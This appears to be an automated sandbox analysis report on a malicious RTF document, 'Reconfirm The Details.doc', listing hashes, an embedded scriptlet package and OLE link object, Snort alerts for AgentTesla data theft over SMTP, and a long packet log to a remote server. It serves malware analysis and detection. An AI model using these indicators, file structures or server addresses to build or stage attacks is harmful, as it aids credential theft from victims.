                                                                                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                              Malicious:false
                                                                                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:Rich Text Format data, unknown version
                                                                                                              Entropy (8bit):3.60648819236507
                                                                                                              TrID:
                                                                                                              • Rich Text Format (5005/1) 55.56%
                                                                                                              • Rich Text Format (4004/1) 44.44%
                                                                                                              File name:Reconfirm The Details.doc
                                                                                                              File size:393215
                                                                                                              MD5:9a7ea1172bf1250005e0fefce04f604f
                                                                                                              SHA1:3df0782fc6ace41e15ca7c98277c79c128453d10
                                                                                                              SHA256:80071fbb7234239c46ced3c6f0fd9aa7dbeafe79d7bfeed7993d51a69c4da006
                                                                                                              SHA512:e7335ac3fddfaea8211273fb070d071436e880d231c4a9e4d01f44aa7a0b680779b30ca6cd09c19759f2e0c7f6aabb6289fdb9fe02858f1dec063085e318346f
                                                                                                              SSDEEP:1536:iV/f9DDDDDDDtyLy0gvQPmfSoBi59Ujs4Qjw7hKfedzFz76mAg5eeVhMDw5wfLj:iHDDDDDDDIgHLdzFtr5RDAw5wff
                                                                                                              File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                                                                                              File Icon

                                                                                                              Icon Hash:e4eea2aaa4b4b4a4

                                                                                                              Static RTF Info

                                                                                                              Objects

                                                                                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                              0000007DAh2embeddedpackage97620abdtfhgXgeghDp.ScTC:\nsdsTggH\abdtfhgXGeghDp.ScTC:\CbkepaDw\abdtfhghgeghDp.ScTno
                                                                                                              1000321F3h2embeddedOLE2LInk2560no

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                              11/25/21-18:15:50.830021TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49167587192.168.2.22208.91.199.224
                                                                                                              11/25/21-18:16:01.234218TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49168587192.168.2.22208.91.199.225
                                                                                                              11/25/21-18:16:13.733229TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49169587192.168.2.22208.91.199.223
                                                                                                              11/25/21-18:16:48.169827TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49172587192.168.2.22208.91.199.224
                                                                                                              11/25/21-18:16:56.612952TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49173587192.168.2.22208.91.199.224
                                                                                                              11/25/21-18:16:57.883879TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49174587192.168.2.22208.91.198.143

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 25, 2021 18:14:53.830594063 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:53.976701021 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:53.976802111 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:53.977502108 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.124871969 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.124969006 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.125030041 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.125087976 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.125258923 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.125307083 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.125312090 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.125314951 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.271748066 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.271838903 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.272073984 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.272281885 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.272366047 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.272474051 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.272543907 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.273787975 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.273843050 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.273931026 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.273947001 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.273987055 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.273993969 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.274039984 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.274130106 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.418554068 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.418601036 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.418621063 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.418642998 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.418859005 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.419271946 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.419298887 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.419332981 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.419348001 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.419373989 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.419418097 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.419424057 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.419465065 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.420228958 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.420283079 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.420347929 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.420398951 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.420553923 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.420604944 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.420605898 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.420655966 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.421164989 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.421199083 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.421217918 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.421243906 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.421272993 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.421317101 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.421327114 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.421365976 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565242052 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565324068 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565355062 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565396070 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565434933 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565474033 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565510035 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565547943 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565603018 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565661907 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565673113 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565677881 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565682888 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565865040 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565903902 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565941095 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565962076 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565979958 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565994978 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566003084 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566019058 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566049099 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566057920 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566076994 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566097975 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566119909 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566137075 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566169977 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566195965 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566200972 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566271067 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566291094 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566358089 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566409111 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566447973 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566482067 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566500902 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566755056 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566790104 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566828966 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566854000 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.567548990 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.567626953 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.567666054 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.567668915 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.567713976 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.567737103 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.567763090 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.567811966 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.567907095 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.567949057 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.567986012 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.568006039 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.568026066 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.568027973 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.568073034 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.568075895 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.568093061 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.568115950 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.568157911 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.568218946 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.587135077 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.712398052 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.712630033 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.712668896 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.712717056 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.712896109 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.712963104 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.713049889 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.713107109 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.720604897 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.720633030 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.720700979 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.720721006 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.720767975 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.720779896 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.720829010 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.721225023 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.721266031 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.721307039 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.721343994 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.721381903 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.721441984 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.721684933 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.721757889 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.721997976 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.722064972 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.722065926 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.722121954 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.722126007 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.722194910 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.722229004 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.722290039 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.722358942 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.722414970 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.722460985 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.722517967 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.722537994 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.722608089 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.722629070 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.722683907 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.722807884 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.722866058 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.722939014 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.722943068 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.722956896 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.722995043 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.723011017 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.723021984 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.723066092 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.723174095 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.723231077 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.725332975 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.727422953 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.733617067 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.733711004 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.733728886 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.733748913 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.733807087 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.733830929 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.734210014 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.734227896 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.734287024 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.734292984 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.734309912 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.734359026 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.734481096 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.734517097 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.734533072 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.734553099 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.734599113 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.734599113 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.734659910 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.734858990 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.734877110 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.734925032 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.734935999 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.734941006 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.734986067 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.735078096 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.735095024 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.735143900 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.735151052 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.735210896 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.735239983 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.735299110 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.735346079 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.735408068 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.735434055 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.735450029 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.735497952 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.736287117 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.859343052 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.859373093 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.859498978 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.859616041 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.859642029 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.859739065 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.859808922 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.866900921 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.866930962 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.867032051 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.867095947 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.867115974 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.867459059 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.867527962 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.868792057 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.868817091 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.868880033 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.868932009 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.868948936 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.868999958 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.869764090 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.869787931 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.869815111 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.869879961 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.869894981 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.869921923 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.869971991 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.869996071 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.870013952 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.870028973 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.870088100 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.870091915 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.870150089 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.870289087 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.870354891 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.871342897 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.871445894 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.871467113 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.871494055 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.871521950 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.873554945 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.873646975 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.880398035 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.880589008 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.880896091 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.880913973 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.880932093 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.880978107 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.881019115 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.882050991 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.882095098 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.882122993 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.882158995 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.882180929 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.882246017 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.882270098 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.882323980 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.882730007 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.882765055 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.882800102 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.882836103 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.882841110 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.882901907 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.882908106 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.882971048 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.883064985 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.883136034 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.883163929 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.883225918 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.883235931 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.883295059 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.883518934 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.883563995 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.883622885 CET4916580192.168.2.22173.232.204.89
